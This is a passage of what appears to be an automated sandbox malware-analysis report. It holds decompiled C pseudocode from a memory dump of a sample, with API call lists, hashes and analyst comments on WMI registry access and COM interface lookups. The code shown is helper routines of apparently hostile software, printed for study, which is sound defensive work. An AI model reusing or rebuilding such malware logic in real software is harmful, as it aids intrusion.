                            • Opcode Fuzzy Hash: c4a972b486b6166d9df22151b6994b696e4ac0d1d17f96beb6fec9431122be47
                            • Instruction Fuzzy Hash: 0931B136900119FFDF11DB94EC85EEA7BBCEB48700F164096B9049B071D6B5AE84FB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E00F15B5B(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                            				void* _v8;
                            				void* __edi;
                            				intOrPtr _t18;
                            				void* _t24;
                            				void* _t30;
                            				void* _t37;
                            				void* _t40;
                            				intOrPtr _t42;
                            
                            				_t37 = __edx;
                            				_t32 = __ecx;
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t42 =  *0xf1d370; // 0x57f9b68
                            				_push(0x800);
                            				_push(0);
                            				_push( *0xf1d270);
                            				if( *0xf1d284 >= 5) {
                            					if(RtlAllocateHeap() == 0) {
                            						L6:
                            						_t30 = 8;
                            						L7:
                            						if(_t30 != 0) {
                            							L10:
                            							 *0xf1d284 =  *0xf1d284 + 1;
                            							L11:
                            							return _t30;
                            						}
                            						_t44 = _a4;
                            						_t40 = _v8;
                            						 *_a16 = _a4;
                            						 *_a20 = E00F147A4(_t44, _t40); // executed
                            						_t18 = E00F16A16(_t40, _t44); // executed
                            						if(_t18 != 0) {
                            							 *_a8 = _t40;
                            							 *_a12 = _t18;
                            							if( *0xf1d284 < 5) {
                            								 *0xf1d284 =  *0xf1d284 & 0x00000000;
                            							}
                            							goto L11;
                            						}
                            						_t30 = 0xbf;
                            						E00F155F1();
                            						HeapFree( *0xf1d270, 0, _t40);
                            						goto L10;
                            					}
                            					_t24 = E00F16367(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
                            					L5:
                            					_t30 = _t24;
                            					goto L7;
                            				}
                            				if(RtlAllocateHeap() == 0) {
                            					goto L6;
                            				}
                            				_t24 = E00F17132(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25);
                            				goto L5;
                            			}

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00F15B7F
                              • Part of subcall function 00F17132: GetTickCount.KERNEL32 ref: 00F17146
                              • Part of subcall function 00F17132: wsprintfA.USER32 ref: 00F17196
                              • Part of subcall function 00F17132: wsprintfA.USER32 ref: 00F171B3
                              • Part of subcall function 00F17132: wsprintfA.USER32 ref: 00F171DF
                              • Part of subcall function 00F17132: HeapFree.KERNEL32(00000000,?), ref: 00F171F1
                              • Part of subcall function 00F17132: wsprintfA.USER32 ref: 00F17212
                              • Part of subcall function 00F17132: HeapFree.KERNEL32(00000000,?), ref: 00F17222
                              • Part of subcall function 00F17132: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00F17250
                              • Part of subcall function 00F17132: GetTickCount.KERNEL32 ref: 00F17261
                            • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00F15B9D
                            • HeapFree.KERNEL32(00000000,?,?,?,00F1512B,00000002,?,?,?,?), ref: 00F15BFA
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Heap$wsprintf$AllocateFree$CountTick
                            • String ID:
                            • API String ID: 1676223858-0
                            • Opcode ID: 012bb4ee55b9079079bf33f336532dfde7113874795e1804903c4052fee382b3
                            • Instruction ID: b17734f95b1efc0e6f17e37ef79d969ade4427bc549324849b27417b5ae986bb
                            • Opcode Fuzzy Hash: 012bb4ee55b9079079bf33f336532dfde7113874795e1804903c4052fee382b3
                            • Instruction Fuzzy Hash: 4B219ABA201609EFCB019F64DD40EDA37BDAB89740F11402AF901D7250DB74E985ABA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E00F1456E(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                            				char _v5;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				char _t28;
                            				void* _t33;
                            				void* _t38;
                            				void* _t45;
                            				char* _t46;
                            				void* _t48;
                            				char* _t56;
                            				char* _t57;
                            				intOrPtr _t59;
                            				void* _t60;
                            
                            				_t56 = _a4;
                            				_t60 = __eax;
                            				_v12 = 0xb;
                            				if(_t56 != 0 && __eax != 0) {
                            					_t5 = _t60 - 1; // -1
                            					_t46 =  &(_t56[_t5]);
                            					_t28 =  *_t46;
                            					_v5 = _t28;
                            					 *_t46 = 0;
                            					__imp__(_a8, _t45);
                            					_v16 = _t28;
                            					_t57 = StrStrA(_t56, _a8);
                            					if(_t57 != 0) {
                            						 *_t46 = _v5;
                            						_t33 = RtlAllocateHeap( *0xf1d270, 0, _a16 + _t60); // executed
                            						_t48 = _t33;
                            						if(_t48 == 0) {
                            							_v12 = 8;
                            						} else {
                            							_t58 = _t57 - _a4;
                            							E00F1AA99(_t57 - _a4, _a4, _t48);
                            							_t38 = E00F1AA99(_a16, _a12, _t58 + _t48);
                            							_t53 = _v16;
                            							_t59 = _a16;
                            							E00F1AA99(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                            							 *_a20 = _t48;
                            							_v12 = _v12 & 0x00000000;
                            							 *_a24 = _t60 - _v16 + _t59;
                            						}
                            					}
                            				}
                            				return _v12;
                            			}

                            APIs
                            • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 00F145A2
                            • StrStrA.SHLWAPI(00000000,?), ref: 00F145AF
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 00F145CE
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 556738718-0
                            • Opcode ID: ad5e73908ef7dcc92045c91a8657821ccfd54fcf675f57fd0566b4fe8731061d
                            • Instruction ID: e3f65c59ba7d5d10a62cdac3accffcd7a33c906cc7c9f5dc57b9b592d46c5e39
                            • Opcode Fuzzy Hash: ad5e73908ef7dcc92045c91a8657821ccfd54fcf675f57fd0566b4fe8731061d
                            • Instruction Fuzzy Hash: 4E217A36A0011AAFCB11CFA8D884BDEBFB5EF89315F058155E804EB315C734E955DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 47%
                            			E00F1311C(char* _a4, char** _a8) {
                            				char* _t7;
                            				char* _t11;
                            				char* _t14;
                            				char* _t16;
                            				char* _t17;
                            				char _t18;
                            				signed int _t20;
                            				signed int _t22;
                            
                            				_t16 = _a4;
                            				_push(0x20);
                            				_t20 = 1;
                            				_push(_t16);
                            				while(1) {
                            					_t7 = StrChrA();
                            					if(_t7 == 0) {
                            						break;
                            					}
                            					_t20 = _t20 + 1;
                            					_push(0x20);
                            					_push( &(_t7[1]));
                            				}
                            				_t11 = E00F155DC(_t20 << 2);
                            				_a4 = _t11;
                            				if(_t11 != 0) {
                            					StrTrimA(_t16, 0xf1c2a4); // executed
                            					_t22 = 0;
                            					do {
                            						_t14 = StrChrA(_t16, 0x20);
                            						if(_t14 != 0) {
                            							 *_t14 = 0;
                            							do {
                            								_t14 =  &(_t14[1]);
                            								_t18 =  *_t14;
                            							} while (_t18 == 0x20 || _t18 == 9);
                            						}
                            						_t17 = _a4;
                            						 *(_t17 + _t22 * 4) = _t16;
                            						_t22 = _t22 + 1;
                            						_t16 = _t14;
                            					} while (_t14 != 0);
                            					 *_a8 = _t17;
                            				}
                            				return 0;
                            			}

                            APIs
                            • StrChrA.SHLWAPI(?,00000020,00000000,057F95AC,?,?,00F13A64,?,057F95AC), ref: 00F13138
                            • StrTrimA.SHLWAPI(?,00F1C2A4,00000002,?,00F13A64,?,057F95AC), ref: 00F13156
                            • StrChrA.SHLWAPI(?,00000020,?,00F13A64,?,057F95AC), ref: 00F13161
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Trim
                            • String ID:
                            • API String ID: 3043112668-0
                            • Opcode ID: 9a8e56632d9f20a67e36e8bc9b8b256e9fde0debe40bc00815d7e1d55d5b2c7d
                            • Instruction ID: e1c58d643a8260ee48c11fefffbd670d05fdd6b1c2d5f81810fe678f93e2daab
                            • Opcode Fuzzy Hash: 9a8e56632d9f20a67e36e8bc9b8b256e9fde0debe40bc00815d7e1d55d5b2c7d
                            • Instruction Fuzzy Hash: 3C01B172B003457EE7105A6A8C44FE73B9DEB897A0F148011B945EB282D670CD82E660
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 63%
                            			E00F162E1(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                            				intOrPtr _v36;
                            				intOrPtr _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				void _v60;
                            				char _v64;
                            				long _t14;
                            				intOrPtr _t18;
                            				intOrPtr _t19;
                            				intOrPtr _t26;
                            				intOrPtr _t27;
                            				long _t28;
                            
                            				_t27 = __edi;
                            				_t26 = _a8;
                            				_t14 = E00F16FB2(_a4, _t26, __edi); // executed
                            				_t28 = _t14;
                            				if(_t28 != 0) {
                            					memset( &_v60, 0, 0x38);
                            					_t18 =  *0xf1d2b8; // 0x48da5a8
                            					_t28 = 0;
                            					_v64 = 0x3c;
                            					if(_a12 == 0) {
                            						_t19 = _t18 + 0xf1e4e8;
                            					} else {
                            						_t19 = _t18 + 0xf1e8d0;
                            					}
                            					_v52 = _t19;
                            					_push(_t28);
                            					_v48 = _a4;
                            					_v44 = _t26;
                            					_v36 = _t27;
                            					E00F12522();
                            					_push( &_v64);
                            					if( *0xf1d0e4() == 0) {
                            						_t28 = GetLastError();
                            					}
                            					_push(1);
                            					E00F12522();
                            				}
                            				return _t28;
                            			}

                            APIs
                              • Part of subcall function 00F16FB2: SysAllocString.OLEAUT32(00000000), ref: 00F1700E
                              • Part of subcall function 00F16FB2: SysAllocString.OLEAUT32(?), ref: 00F17022
                              • Part of subcall function 00F16FB2: SysAllocString.OLEAUT32(00000000), ref: 00F17034
                              • Part of subcall function 00F16FB2: SysFreeString.OLEAUT32(00000000), ref: 00F17098
                            • memset.NTDLL ref: 00F16304
                            • GetLastError.KERNEL32 ref: 00F16350
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: String$Alloc$ErrorFreeLastmemset
                            • String ID: <
                            • API String ID: 1330562889-4251816714
                            • Opcode ID: 633cbd3bab288509951051262754eb04466caa3b4f88481e03536eb354e4108f
                            • Instruction ID: bf54e352dbdfa27335c4e73e0021bdcc27bb0187e91ac3565d575df1bfda1a00
                            • Opcode Fuzzy Hash: 633cbd3bab288509951051262754eb04466caa3b4f88481e03536eb354e4108f
                            • Instruction Fuzzy Hash: 47018071D00218EBDB10EFA8DC85EDEBBF8BB08750F45402AF904E7251D774C980ABA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F160DD(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                            				int _v12;
                            				signed int _v16;
                            				void* _v20;
                            				signed char _v36;
                            				void* _t24;
                            				intOrPtr _t27;
                            				signed int _t38;
                            				signed char* _t46;
                            				int _t53;
                            				void* _t55;
                            				void* _t56;
                            				void* _t57;
                            
                            				_v16 = _v16 & 0x00000000;
                            				_t46 = _a4;
                            				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                            				_v12 = 0x110;
                            				_t24 = E00F155DC(_t53);
                            				_a4 = _t24;
                            				if(_t24 != 0) {
                            					memcpy(_t24,  *0xf1d308, 0x110);
                            					_t27 =  *0xf1d30c; // 0x0
                            					_t57 = _t56 + 0xc;
                            					if(_t27 != 0) {
                            						_t51 = _a4;
                            						E00F16E0F(0x110, _a4, _t27, 0);
                            					}
                            					if(E00F18DD3( &_v36) != 0 && E00F16E7F(0x110, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
                            						_t55 = _v20;
                            						_v36 =  *_t46;
                            						_t38 = E00F12363(_t55, _a8, _t51, _t46, _a12); // executed
                            						_v16 = _t38;
                            						 *(_t55 + 4) = _v36;
                            						memset(_t55, 0, _v12 - (_t46[4] & 0xf));
                            						_t57 = _t57 + 0xc;
                            						E00F16DFA(_t55);
                            					}
                            					memset(_a4, 0, _t53);
                            					E00F16DFA(_a4);
                            				}
                            				return _v16;
                            			}

                            APIs
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • memcpy.NTDLL(00000000,00000110,?,?,?,00000008), ref: 00F16113
                            • memset.NTDLL ref: 00F16188
                            • memset.NTDLL ref: 00F1619C
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: memset$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 1529149438-0
                            • Opcode ID: 76bcf1a56a922433fa7a9a302c5fff9d8186457caebea78c61d71590b1e18f47
                            • Instruction ID: 7d84e401e0ac408e7f9440a5a13b92ba5a62ffee000d990573ed373c52e7a56d
                            • Opcode Fuzzy Hash: 76bcf1a56a922433fa7a9a302c5fff9d8186457caebea78c61d71590b1e18f47
                            • Instruction Fuzzy Hash: 41213175A00218BBDB11AF55CC41FDE7BB8AF08754F044065F905E6242EB38DA91DBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E00F14176(intOrPtr _a4) {
                            				void* _v12;
                            				void* _v16;
                            				void* _v20;
                            				void* _v24;
                            				void* _v28;
                            				char _v32;
                            				intOrPtr _v40;
                            				void* _v46;
                            				short _v48;
                            				intOrPtr _t49;
                            				void* _t51;
                            				intOrPtr* _t53;
                            				intOrPtr _t56;
                            				void* _t58;
                            				intOrPtr* _t59;
                            				intOrPtr* _t61;
                            				intOrPtr* _t63;
                            				intOrPtr* _t65;
                            				intOrPtr* _t67;
                            				intOrPtr* _t69;
                            				intOrPtr* _t71;
                            				intOrPtr* _t73;
                            				intOrPtr _t76;
                            				intOrPtr* _t79;
                            				short _t81;
                            				char* _t97;
                            				intOrPtr _t99;
                            				void* _t105;
                            				void* _t107;
                            				intOrPtr _t111;
                            
                            				_t81 = 0;
                            				_v48 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosw");
                            				_t49 =  *0xf1d2b8; // 0x48da5a8
                            				_t4 = _t49 + 0xf1e44c; // 0x57f89f4
                            				_t51 =  *0xf1d124(_t49 + 0xf1e43c, 0, 4, _t4,  &_v20); // executed
                            				_t105 = _t51;
                            				if(_t105 >= 0) {
                            					_t53 = _v20;
                            					_push( &_v12);
                            					_push(1);
                            					_push( &_v32);
                            					_push(8);
                            					_t97 =  &_v48;
                            					_push(_t97);
                            					_push(_t97);
                            					_push(_t53); // executed
                            					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
                            						_t56 =  *0xf1d2b8; // 0x48da5a8
                            						_t30 = _t56 + 0xf1e42c; // 0x57f89d4
                            						_t58 =  *0xf1d0f0(_v12, _t56 + 0xf1e45c, _t30,  &_v24); // executed
                            						_t105 = _t58;
                            						_t59 = _v12;
                            						 *((intOrPtr*)( *_t59 + 8))(_t59);
                            						goto L11;
                            					} else {
                            						_t71 = _v20;
                            						_v16 = 0;
                            						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
                            						if(_t105 >= 0) {
                            							_t111 = _v16;
                            							if(_t111 == 0) {
                            								_t105 = 0x80004005;
                            								goto L11;
                            							} else {
                            								if(_t111 <= 0) {
                            									L11:
                            									if(_t105 >= 0) {
                            										goto L12;
                            									}
                            								} else {
                            									do {
                            										_t73 = _v20;
                            										_v48 = 3;
                            										_v40 = _t81;
                            										_t107 = _t107 - 0x10;
                            										asm("movsd");
                            										asm("movsd");
                            										asm("movsd");
                            										asm("movsd");
                            										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
                            										if(_t105 < 0) {
                            											goto L7;
                            										} else {
                            											_t76 =  *0xf1d2b8; // 0x48da5a8
                            											_t23 = _t76 + 0xf1e42c; // 0x57f89d4
                            											_t105 =  *0xf1d0f0(_v12, _t76 + 0xf1e45c, _t23,  &_v24);
                            											_t79 = _v12;
                            											 *((intOrPtr*)( *_t79 + 8))(_t79);
                            											if(_t105 >= 0) {
                            												L12:
                            												_t63 = _v24;
                            												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
                            												if(_t105 >= 0) {
                            													_t99 =  *0xf1d2b8; // 0x48da5a8
                            													_t67 = _v28;
                            													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t99 + 0xf1e41c, _a4);
                            													_t69 = _v28;
                            													 *((intOrPtr*)( *_t69 + 8))(_t69);
                            												}
                            												_t65 = _v24;
                            												 *((intOrPtr*)( *_t65 + 8))(_t65);
                            											} else {
                            												goto L7;
                            											}
                            										}
                            										goto L15;
                            										L7:
                            										_t81 = _t81 + 1;
                            									} while (_t81 < _v16);
                            									goto L11;
                            								}
                            							}
                            						}
                            					}
                            					L15:
                            					_t61 = _v20;
                            					 *((intOrPtr*)( *_t61 + 8))(_t61);
                            				}
                            				return _t105;
                            			}

                            APIs
                            • IUnknown_QueryService.SHLWAPI(00000000,?,057F89D4,00F16FE2,?,?,?,?,?,?,?,?,?,?,?,00F16FE2), ref: 00F14242
                            • IUnknown_QueryService.SHLWAPI(00000000,?,057F89D4,00F16FE2,?,?,?,?,?,?,?,00F16FE2,00000000,00000000,00000000,?), ref: 00F14280
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: QueryServiceUnknown_
                            • String ID:
                            • API String ID: 2042360610-0
                            • Opcode ID: 889f898c44322d8a8851a53e3f5a9876963d5f3903505cf9df586fdced24dee6
                            • Instruction ID: f02a17e86ba07f11f971381789d49a473c79954ad889253a69e0a52494b17590
                            • Opcode Fuzzy Hash: 889f898c44322d8a8851a53e3f5a9876963d5f3903505cf9df586fdced24dee6
                            • Instruction Fuzzy Hash: 2E512E75900119AFDB04CFE8C888DEEB7B8FF88710B158598E915EB220D775A985DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E00F15A5E(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                            				void* _v8;
                            				void* __esi;
                            				intOrPtr* _t35;
                            				void* _t40;
                            				intOrPtr* _t41;
                            				intOrPtr* _t43;
                            				intOrPtr* _t45;
                            				intOrPtr* _t50;
                            				intOrPtr* _t52;
                            				void* _t54;
                            				intOrPtr* _t55;
                            				intOrPtr* _t57;
                            				intOrPtr* _t61;
                            				intOrPtr* _t65;
                            				intOrPtr _t68;
                            				void* _t72;
                            				void* _t75;
                            				void* _t76;

                            				// Generic WMI method-call wrapper (the report flags "Writes or reads registry keys via WMI";
                            				// E00F13196 below calls this with HKEY_LOCAL_MACHINE). The dump does not name the vtable
                            				// slots; the interface/method names in the comments are inferred from slot offset and
                            				// argument count and should be read as interpretation, not recovered symbols.
                            				_t55 = _a4;                                   // caller context: [0] = service object, [4] = class object
                            				_t35 =  *((intOrPtr*)(_t55 + 4));
                            				_a4 = 0;                                      // reused below to receive the out-parameter object
                            				// slot 0x4c, (name, 0, &obj, 0): IWbemClassObject::GetMethod shape; _v8 receives the in-parameter template
                            				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                            				if(_t76 < 0) {
                            					L18:
                            					return _t76;                              // HRESULT
                            				}
                            				// fills the in-parameters; the subcall allocates BSTRs (SysAllocString in the APIs list) and
                            				// returns them through &_a20 / &_a12 so they can be freed at the end of this function
                            				_t40 = E00F16A4D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                            				_t76 = _t40;
                            				if(_t76 >= 0) {
                            					_t61 = _a28;                              // caller-supplied VARIANT
                            					if(_t61 != 0 &&  *_t61 != 0) {            // vt != VT_EMPTY: it is an input value
                            						_t52 = _v8;
                            						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);   // slot 0x14, (name, 0, VARIANT*, 0): Put shape
                            					}
                            					if(_t76 >= 0) {
                            						_t43 =  *_t55;
                            						_t68 =  *0xf1d2b8; // 0x48da5a8 -- delta added to every string/IID constant in this module
                            						// slot 0x60, (path, method, 0, 0, inParams, &outParams, 0): IWbemServices::ExecMethod shape
                            						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t68 + 0xf1e1fc, _a16, 0, 0, _v8,  &_a4, 0);
                            						if(_t76 >= 0) {
                            							_t76 = E00F14B0E(_a4);             // checks the out-parameter object
                            							if(_t76 >= 0) {
                            								_t65 = _a28;
                            								if(_t65 != 0 &&  *_t65 == 0) {    // VT_EMPTY: caller wants the output value instead
                            									_t50 = _a4;
                            									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);   // slot 0x10, (name, 0, VARIANT*, 0, 0): Get shape
                            								}
                            							}
                            						}
                            						_t45 = _a4;
                            						if(_t45 != 0) {
                            							 *((intOrPtr*)( *_t45 + 8))(_t45);   // slot 8: Release(outParams)
                            						}
                            						_t57 = __imp__#6;                     // OLEAUT32 ordinal 6 = SysFreeString (refs 00F15B3D / 00F15B47 in the APIs list)
                            						if(_a20 != 0) {
                            							 *_t57(_a20);
                            						}
                            						if(_a12 != 0) {
                            							 *_t57(_a12);
                            						}
                            					}
                            				}
                            				_t41 = _v8;
                            				 *((intOrPtr*)( *_t41 + 8))(_t41);          // Release(inParams)
                            				goto L18;
                            			}
                            Address column of the listing above (one entry per statement of the raw output, in order):
                            0x00f15a64 0x00f15a67 0x00f15a77 0x00f15a80 0x00f15a84 0x00f15b52 0x00f15b58 0x00f15b58
                            0x00f15a9e 0x00f15aa3 0x00f15aa7 0x00f15aad 0x00f15ab2 0x00f15ab9 0x00f15ac8 0x00f15ac8
                            0x00f15acc 0x00f15ace 0x00f15ada 0x00f15af0 0x00f15af4 0x00f15afe 0x00f15b02 0x00f15b04
                            0x00f15b09 0x00f15b10 0x00f15b20 0x00f15b20 0x00f15b09 0x00f15b02 0x00f15b22 0x00f15b27
                            0x00f15b2c 0x00f15b2c 0x00f15b32 0x00f15b38 0x00f15b3d 0x00f15b3d 0x00f15b42 0x00f15b47
                            0x00f15b47 0x00f15b42 0x00f15acc 0x00f15b49 0x00f15b4f 0x00000000

                            APIs
                              • Part of subcall function 00F16A4D: SysAllocString.OLEAUT32(80000002), ref: 00F16AA4
                              • Part of subcall function 00F16A4D: SysFreeString.OLEAUT32(00000000), ref: 00F16B09
                            • SysFreeString.OLEAUT32(?), ref: 00F15B3D
                            • SysFreeString.OLEAUT32(00F14993), ref: 00F15B47
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: String$Free$Alloc
                            • String ID:
                            • API String ID: 986138563-0
                            • Opcode ID: ecdbbad3aef7f780d60d6113ba21933cefce9aee43c18d3881e59346e13887af
                            • Instruction ID: b0e575bdac3da83a7a338dc7fcaa684d6ef7ecf5cabceb597f91e535bf4b40f3
                            • Opcode Fuzzy Hash: ecdbbad3aef7f780d60d6113ba21933cefce9aee43c18d3881e59346e13887af
                            • Instruction Fuzzy Hash: 60314872900518EFCB21DF95CC88CEBBB79FFC9B507144658F8159B210D235AD91DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 45%
                            			E00F15F72(intOrPtr* __eax, intOrPtr _a4) {
                            				void* _v8;
                            				void* _v12;
                            				void* _v16;
                            				intOrPtr* _t22;
                            				void* _t23;
                            				intOrPtr* _t24;
                            				intOrPtr* _t26;
                            				intOrPtr* _t28;
                            				intOrPtr* _t30;
                            				void* _t31;
                            				intOrPtr* _t32;
                            				intOrPtr _t42;
                            				intOrPtr _t45;
                            				intOrPtr _t48;
                            				void* _t51;

                            				// Three-step interface lookup. The raw output shows the first call as four _push()
                            				// statements; they are folded into one call here. All three constants are resolved
                            				// through the delta at 0xf1d2b8; the two passed to slot 0 are IIDs (QueryInterface,
                            				// refs 00F15FAF / 00F15FE0 in the APIs list). Slots 0x3c and 0x1c are not named by the dump.
                            				_t42 =  *0xf1d2b8; // 0x48da5a8
                            				_t51 =  *((intOrPtr*)( *__eax + 0x3c))(__eax, 0, _t42 + 0xf1e46c,  &_v16);
                            				if(_t51 >= 0) {
                            					_t22 = _v16;
                            					_t45 =  *0xf1d2b8; // 0x48da5a8
                            					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t45 + 0xf1e48c,  &_v12); // executed -- QueryInterface(riid, &_v12)
                            					_t51 = _t23;
                            					if(_t51 >= 0) {
                            						_t26 = _v12;
                            						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);   // slot 0x1c, one out pointer
                            						if(_t51 >= 0) {
                            							_t48 =  *0xf1d2b8; // 0x48da5a8
                            							_t30 = _v8;
                            							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t48 + 0xf1e47c, _a4); // executed -- QueryInterface(riid, _a4): the interface handed back to the caller
                            							_t51 = _t31;
                            							_t32 = _v8;
                            							 *((intOrPtr*)( *_t32 + 8))(_t32);      // Release; the caller keeps the reference obtained through _a4
                            						}
                            						_t28 = _v12;
                            						 *((intOrPtr*)( *_t28 + 8))(_t28);          // Release
                            					}
                            					_t24 = _v16;
                            					 *((intOrPtr*)( *_t24 + 8))(_t24);              // Release
                            				}
                            				return _t51;                                    // HRESULT of the last step that ran
                            			}
                            Address column of the listing above (one entry per statement of the raw output, in order):
                            0x00f15f7e 0x00f15f7f 0x00f15f8b 0x00f15f8c 0x00f15f8e 0x00f15f92 0x00f15f96 0x00f15f98
                            0x00f15fa1 0x00f15faf 0x00f15fb1 0x00f15fb5 0x00f15fb7 0x00f15fc4 0x00f15fc8 0x00f15fcd
                            0x00f15fd3 0x00f15fe0 0x00f15fe2 0x00f15fe4 0x00f15fea 0x00f15fea 0x00f15fed 0x00f15ff3
                            0x00f15ff3 0x00f15ff6 0x00f15ffc 0x00f15ffc 0x00f16003

                            APIs
                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,?,?), ref: 00F15FAF
                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,?,?), ref: 00F15FE0
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Interface_ProxyQueryUnknown_
                            • String ID:
                            • API String ID: 2522245112-0
